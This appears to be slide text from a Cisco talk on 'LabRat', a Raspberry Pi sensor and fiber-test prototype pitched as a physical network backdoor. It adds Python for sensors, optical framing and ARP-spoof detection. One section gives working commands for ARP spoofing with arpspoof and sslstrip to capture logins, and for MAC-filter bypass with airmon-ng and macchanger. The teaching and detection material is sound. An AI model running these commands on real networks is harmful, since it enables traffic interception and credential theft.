The LabRat - Physical backdoor hacks and IOT primer
The LabRat Physical Backdoor Hacks
and Internet of Things (IOT) Primer
Akshat Sharma, TME, Cisco Systems.
The Raspberry Pi
Image downloads and updates: http://www.raspberrypi.org/downloads
Working with GPIO: http://elinux.org/RPi_Low-level_peripherals
Interfacing with screens: http://elinux.org/RPiconfig
Google’s your Best Friend
Raspberry Pi as a Physical Backdoor into your network
http://securityaffairs.co/wordpress/15471/hacking/raspberry-pi-as-physical-backdoor.html
It’s a device “you can just plug in and do a full-scale penetration test from start to finish,” Porcello says. “The enterprise can use stuff like this to do testing more often and more cheaply than they’re doing it right now.” -- CEO of Pwnie Express, Dave Porcello
Rogue APs
Mac Spoofing on wired Networks
MITM attacks
The LabRat Circuit (diagram): Temperature Sensor, Humidity Sensor, Optical Fiber Tester
- Temperature and humidity sensors wired to the ADC inputs CH0 to CH3
- ADC connected to the Raspberry Pi over SPI: CLK, CS (active low), MOSI, MISO
- Optical fiber tester: two IR LED-receiver pairs, one at each end of the fiber, each with a binary signal in
The LabRat- a Proof of Concept Prototype
The Raspberry Pi: a $35 Linux computer that powers the LabRat prototype.
For more information on the Raspberry Pi, visit http://www.raspberrypi.org/
The LabRat Prototype: Current Setup
- 10 inch capacitive touchscreen
- Optical fiber tester
- Humidity sensor
- Temperature sensor
- Raspberry Pi
- HDMI-to-LVDS converter board
- 10,000 mAh lithium polymer battery
The LabRat Prototype: LM35 + ADS7841 Temperature Sensor
- LM35 temperature sensor
- ADS7841 analog-to-digital converter
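How the Pi actually gets a temperature out of this pair: the ADS7841 is a 12-bit SPI converter, so the Pi clocks a control byte selecting the LM35's channel, reads the 12-bit result back, scales it by the reference voltage and divides by the LM35's 10 mV per degree. The following is an added example, not the LabRat author's code. It assumes the ADS7841 is on the Pi's SPI0 bus with chip select CE0, the LM35 is on CH0, and VREF is 3.3 V; the control-byte layout and single-ended channel codes follow my reading of the ADS7841 datasheet and should be checked against your copy. A fake device is included so the script runs off the Pi, and a small hysteresis alarm shows how to avoid sending an e-mail for every sample once a threshold is crossed.

```python
"""Read the LM35 through the ADS7841 and turn the sample into degrees Celsius.

Added example for the LM35 + ADS7841 slide; not the LabRat author's code.
Assumptions: ADS7841 on SPI0/CE0 (the CLK/CS/MOSI/MISO lines of the circuit
slide), LM35 on CH0, VREF = 3.3 V. Control-byte layout and channel codes are
from my reading of the ADS7841 datasheet; verify them against yours.
"""

VREF = 3.3                 # assumed voltage on the ADS7841 VREF pin
ADC_MAX = 4095             # 12-bit converter
LM35_VOLTS_PER_C = 0.010   # LM35: 10 mV per degree C, 0 V at 0 C

# Single-ended channel select bits A2 A1 A0 (ADS7841 datasheet table, as read by me).
_CHANNEL_BITS = {0: 0b001, 1: 0b101, 2: 0b010, 3: 0b110}


def ads7841_control_byte(channel, power_down=0b00):
    """Control word: S=1 | A2 A1 A0 | MODE=0 (12-bit) | SGL/DIF=1 (single-ended) | PD1 PD0."""
    if channel not in _CHANNEL_BITS:
        raise ValueError("ADS7841 has channels 0..3")
    return 0x80 | (_CHANNEL_BITS[channel] << 4) | 0x04 | (power_down & 0b11)


def ads7841_decode(response):
    """Pull the 12-bit result out of the three bytes returned by xfer2([ctrl, 0, 0]).

    Byte 0 comes back while the control byte goes out and carries nothing.
    Byte 1 is a null bit followed by the seven MSBs; byte 2 holds the five LSBs
    left-aligned, so its bottom three bits are padding.
    """
    if len(response) != 3:
        raise ValueError("expected three bytes from the ADS7841")
    return (((response[1] << 8) | response[2]) >> 3) & 0x0FFF


def code_to_volts(code, vref=VREF):
    """Convert a 12-bit sample to the voltage seen on the channel."""
    return code * vref / ADC_MAX


def lm35_celsius(code, vref=VREF):
    """LM35 in its basic (0 to +150 C) configuration: 10 mV per degree."""
    return code_to_volts(code, vref) / LM35_VOLTS_PER_C


class ThresholdAlarm:
    """Fire once when the reading rises above `high`; re-arm only after it falls
    back below `high - hysteresis`, so a value hovering around the limit does
    not trigger one e-mail per sample."""

    def __init__(self, high, hysteresis=1.0):
        self.high = high
        self.rearm_below = high - hysteresis
        self.active = False

    def update(self, value):
        """Return True only on the transition into the alarm state."""
        if not self.active and value > self.high:
            self.active = True
            return True
        if self.active and value < self.rearm_below:
            self.active = False
        return False


def read_channel(channel, spi=None):
    """One conversion from the given channel. `spi` is a py-spidev SpiDev or
    anything with the same xfer2(); opened on SPI0/CE0 if not supplied."""
    if spi is None:
        import spidev  # present on the Pi; not needed for the offline demo below
        spi = spidev.SpiDev()
        spi.open(0, 0)
        spi.max_speed_hz = 1_000_000  # assumed; keep under the datasheet's max SCLK
    return ads7841_decode(spi.xfer2([ads7841_control_byte(channel), 0, 0]))


class FakeAds7841:
    """Stand-in for the chip so the example runs off the Pi; returns a fixed code."""

    def __init__(self, code):
        self.code = code

    def xfer2(self, data):
        word = (self.code & 0x0FFF) << 3           # 12 data bits, 3 padding bits
        return [0x00, (word >> 8) & 0x7F, word & 0xFF]


if __name__ == "__main__":
    alarm = ThresholdAlarm(high=30.0, hysteresis=2.0)
    for code in (310, 380, 372, 340, 330, 380):   # constructed samples
        temp_c = lm35_celsius(read_channel(0, FakeAds7841(code)))
        print(f"code {code:4d} -> {temp_c:5.1f} C  alert={alarm.update(temp_c)}")
```

On the real board, drop the FakeAds7841 argument and `read_channel(0)` talks to the chip through py-spidev; the decode and conversion stay the same. The humidity sensor on the slides has no part number, so its channel-to-percent conversion is left to its own datasheet.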
The LabRat Prototype: Humidity Sensor SMD + ADS7841
- Humidity sensor (SMD)
- ADS7841 analog-to-digital converter
The LabRat Prototype: Optical Fiber Tester
- Optical fiber holders
- Infrared LED-receiver combination to transmit messages via the fiber
Connecting to an IOT Cloud
- https://xively.com/
- Formerly Cosm, Pachube
Set up a Cosm (now Xively) account
• Register on Cosm (Xively) and add a device
• You will receive an API key and a feed ID
• Now use the old Cosm eeml library to set up datastreams from the Raspberry Pi
Setting up the Python Script to send Data to Xively
Install the EEML package from GitHub:
    sudo apt-get install python-dev
    sudo apt-get install python-pip
    sudo easy_install -U distribute
    sudo pip install rpi.gpio        # RPi.GPIO: work with the Raspberry Pi GPIO pins
    wget -O geekman-python-eeml.tar.gz https://github.com/geekman/python-eeml/tarball/master
    tar zxvf geekman-python-eeml.tar.gz
    cd geekman-python-eeml*
    sudo python setup.py install
Set up the Python script:
    # source eeml package
    import eeml
    <snip>
    API_KEY = 'YOUR_API_KEY'
    FEED = YOUR_FEED_ID
    API_URL = '/v2/feeds/{feednum}.xml'.format(feednum=FEED)
The LabRat Prototype Online Real-Time Feed: Temperature and Humidity
Visit the real-time feed at https://cosm.com/feeds/89297
The LabRat Prototype Python Scripts
1) A Python script that uploads the temperature and humidity data to an online cloud-based feed, showing how the LabRat may in future do the same with sensor data at customer labs to provide real-time analytics.
2) The same Python script e-mails the lab admins whenever the temperature or humidity exceeds a pre-decided threshold.
3) Another Python script sends messages (binary data) through an optical fiber using an infrared LED-receiver combination and e-mails the data to the user. The same data may later be uploaded to an inventory management system to automatically track working equipment and its performance.
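Script 3 turns bytes into LED on/off states and back again, which only works if the receiver can find where each byte starts and tell a clean byte from a corrupted one. The slides say nothing about how the binary data is framed, so the following is an added example and not the presentation's script: it uses idle-dark, one start bit, eight data bits LSB first, an even-parity bit and one stop bit (my choice, a UART-like scheme), a simulated fault to show parity catching a flipped bit, and a transmit loop whose LED callback is an assumption standing in for RPi.GPIO output. The bit rate is an assumption too.

```python
"""Frame bytes for an on/off optical link like the LabRat's IR LED -> fiber -> receiver.

Added example, not the presentation's script. The slides only say binary data is
sent through the fiber; the framing here (idle dark, one start bit, 8 data bits
LSB first, an even-parity bit, one stop bit) is my choice to show how a receiver
finds byte boundaries and detects a corrupted bit. Pin and bit rate are assumed.
"""
import time

IDLE = 0              # LED off between frames
START = 1
STOP = 0
BIT_PERIOD_S = 0.010  # assumed 100 bit/s, slow enough for a Python GPIO loop
FRAME_LEN = 11        # start + 8 data + parity + stop


def even_parity(bits):
    """Parity bit that makes the total number of 1s in data+parity even."""
    return sum(bits) & 1


def encode_byte(value):
    """Line states for one byte: start, d0..d7 (LSB first), parity, stop."""
    data = [(value >> i) & 1 for i in range(8)]
    return [START] + data + [even_parity(data)] + [STOP]


def encode_message(payload):
    """Frame every byte and put one idle bit after each frame so the receiver
    always sees a dark gap before the next start bit."""
    line = []
    for b in payload:
        line.extend(encode_byte(b))
        line.append(IDLE)
    return line


def decode_line(states):
    """Recover bytes from a sampled line. Returns (payload, errors) where each
    error is (kind, sample_index); a frame with bad parity is dropped, a frame
    with a bad stop bit causes a resync from the next sample."""
    out, errors, i = bytearray(), [], 0
    while i < len(states):
        if states[i] != START:
            i += 1
            continue
        frame = states[i:i + FRAME_LEN]
        if len(frame) < FRAME_LEN:
            errors.append(("truncated", i))
            break
        data, parity, stop = frame[1:9], frame[9], frame[10]
        if stop != STOP:
            errors.append(("framing", i))
            i += 1
            continue
        if parity != even_parity(data):
            errors.append(("parity", i))
        else:
            out.append(sum(bit << k for k, bit in enumerate(data)))
        i += FRAME_LEN
    return bytes(out), errors


def flip_bit(states, index):
    """Constructed fault: invert one sample, as a dirty fiber end might."""
    faulty = list(states)
    faulty[index] ^= 1
    return faulty


def transmit(states, set_led, period=BIT_PERIOD_S, sleep=time.sleep):
    """Drive the LED one state per bit period. On the Pi, set_led would be
    lambda s: GPIO.output(LED_PIN, s) after RPi.GPIO setup (assumed pin); here
    it is any callable so the example runs without hardware."""
    for s in states:
        set_led(s)
        sleep(period)
    set_led(IDLE)


if __name__ == "__main__":
    line = encode_message(b"LabRat OK")
    print(decode_line(line))                 # (b'LabRat OK', [])
    print(decode_line(flip_bit(line, 3)))    # first byte dropped with a parity error
```

Parity only detects an odd number of flipped bits per byte; if the fiber is noisy enough to corrupt two bits in one frame, a CRC over the whole message is the next step up.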
The LabRat Prototype: Current List of Penetration-Testing Tools
Information Gathering: wireshark, tcpflow, ngrep, hostmap, kismet, btscanner, sslscan, sslstrip, sslsniff, ssldump, tcptraceroute, netmask, tcpdump, zenmap, nmap, arp-fingerprint, dnswalk, dnstracer
Vulnerability Assessment: airodump-ng, sqlmap, nikto, svcrack
Exploitation Tools: aircrack-ng, airmon-ng, airodump-ng, aireplay-ng, sqlninja, exploit-db
Privilege Escalation: wireshark, ettercap, tcpreplay, tcpick, packit, packeth, dsniff
Maintaining Access: ptunnel, netcat, ftp-proxy, udp-tunnel, proxychains, dns2tcp
DEMO
- ARP spoofing using sslstrip and arpspoof
- MAC spoofing using airmon-ng and macchanger
- Packet sniffing using Wireshark
- Other MITM attacks
ARP Spoofing and MAC Spoofing Attacks
ARP Spoofing
• Enable IP forwarding and redirect HTTP (port 80) to the sslstrip listener on port 8080:
    echo '1' > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
• Start ARP spoofing. Spoof the gateway:
    arpspoof -i wlan0 <gateway address>
• Start sslstrip and log user information (the -k option kills users' current sessions, forcing them to re-login):
    sslstrip -k -l 8080
  Caveat: only traffic that starts over plain HTTP is redirected and downgraded; a site the browser already knows through HSTS is requested over HTTPS directly and is not stripped.
MAC Spoofing on Wi-Fi (how to bypass MAC filtering)
• ifconfig eth0 down
• airmon-ng start wlan0 (older aircrack-ng releases create a separate monitor interface such as mon0; use that one with airodump-ng)
• iwlist wlan0 scanning
• airodump-ng -c 6 -a --bssid <MAC address of the wireless access point>  (gives info on the connected devices)
• ifconfig wlan0 down
• Now use macchanger:
    macchanger -m <MAC of an allowed device> wlan0
• ifconfig wlan0 up
  MAC filtering only identifies a client, it does not authenticate it, which is why cloning an allowed MAC gets past it.
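The ARP spoofing demo above leaves a clear footprint on the wire: arpspoof keeps sending replies claiming the gateway IP is at the attacker's MAC, so a second MAC appears for an IP that already had one, and replies for that IP arrive far more often than real hosts ever answer. The following is an added example for the defender's side, not part of the slides: it parses lines in the shape `tcpdump -n arp` prints and raises alerts on those two symptoms. The capture is constructed for the demo, not recorded (b8:27:eb is the Raspberry Pi Foundation OUI, chosen to look like a rogue Pi); the burst window and limit are assumptions to tune per network.

```python
"""Watch for the ARP-spoofing demo from the defender's side.

Added example; not part of the slides. Parses lines in the shape `tcpdump -n arp`
prints and flags two symptoms of `arpspoof` pointed at the gateway: the gateway IP
claimed by a second MAC, and a burst of unsolicited replies for one IP. The sample
capture is constructed, not recorded; window and limit are assumptions.
"""
import re
from collections import defaultdict, deque

ARP_REPLY = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"is-at (?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})")


def parse_ts(ts):
    """hh:mm:ss.ffffff -> seconds since midnight (enough to order one capture)."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


class ArpWatcher:
    def __init__(self, gateway_ip, burst_window_s=10.0, burst_limit=5):
        self.gateway_ip = gateway_ip
        self.claims = defaultdict(list)    # ip -> MACs seen claiming it, in order
        self.recent = defaultdict(deque)   # ip -> timestamps of recent replies
        self.window = burst_window_s
        self.limit = burst_limit

    def feed(self, line):
        """Process one capture line; return a list of alert strings (usually empty)."""
        m = ARP_REPLY.match(line)
        if not m:                          # requests, non-ARP or truncated lines
            return []
        ts, ip, mac = parse_ts(m["ts"]), m["ip"], m["mac"].lower()
        alerts = []

        # Symptom 1: a second MAC claims an IP we already have a binding for.
        # arpspoof does exactly this for the gateway; a swapped NIC does too,
        # so the gateway gets HIGH and anything else MEDIUM.
        seen = self.claims[ip]
        if seen and mac not in seen:
            sev = "HIGH" if ip == self.gateway_ip else "MEDIUM"
            alerts.append(f"{sev}: {ip} now also claimed by {mac} (first seen {seen[0]})")
        if mac not in seen:
            seen.append(mac)

        # Symptom 2: arpspoof re-sends its reply every couple of seconds to keep
        # caches poisoned; real hosts answer only when asked.
        q = self.recent[ip]
        q.append(ts)
        while q and ts - q[0] > self.window:
            q.popleft()
        if len(q) == self.limit:           # fires once, as the count crosses the limit
            alerts.append(f"MEDIUM: {len(q)} ARP replies for {ip} within {self.window:.0f}s")
        return alerts


def scan(lines, gateway_ip):
    """Run a whole capture through one watcher and collect every alert."""
    watcher = ArpWatcher(gateway_ip)
    return [alert for line in lines for alert in watcher.feed(line)]


# Constructed sample in `tcpdump -n arp` shape: the real gateway answers once,
# then a Pi-looking MAC repeatedly claims the gateway address.
SAMPLE_CAPTURE = """\
12:00:00.100000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
12:00:00.900000 ARP, Request who-has 192.168.1.20 tell 192.168.1.10, length 28
12:00:05.000000 ARP, Reply 192.168.1.1 is-at b8:27:eb:12:34:56, length 28
12:00:07.000000 ARP, Reply 192.168.1.1 is-at b8:27:eb:12:34:56, length 28
12:00:09.000000 ARP, Reply 192.168.1.1 is-at b8:27:eb:12:34:56, length 28
12:00:11.000000 ARP, Reply 192.168.1.1 is-at b8:27:eb:12:34:56, length 28
12:00:12.000000 ARP, Reply 192.168.1.1 is-at b8:27:eb:12:34:56, length 28
""".splitlines()

if __name__ == "__main__":
    for alert in scan(SAMPLE_CAPTURE, gateway_ip="192.168.1.1"):
        print(alert)
```

Feeding it live is a matter of piping `tcpdump -n -l arp` into the script's standard input. A static ARP entry for the gateway on critical hosts, or dynamic ARP inspection on the switch, is the control that stops the attack rather than just seeing it.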
Putting The Internet of Things into Perspective Co-incidental Cisco Plugin :p
Thank You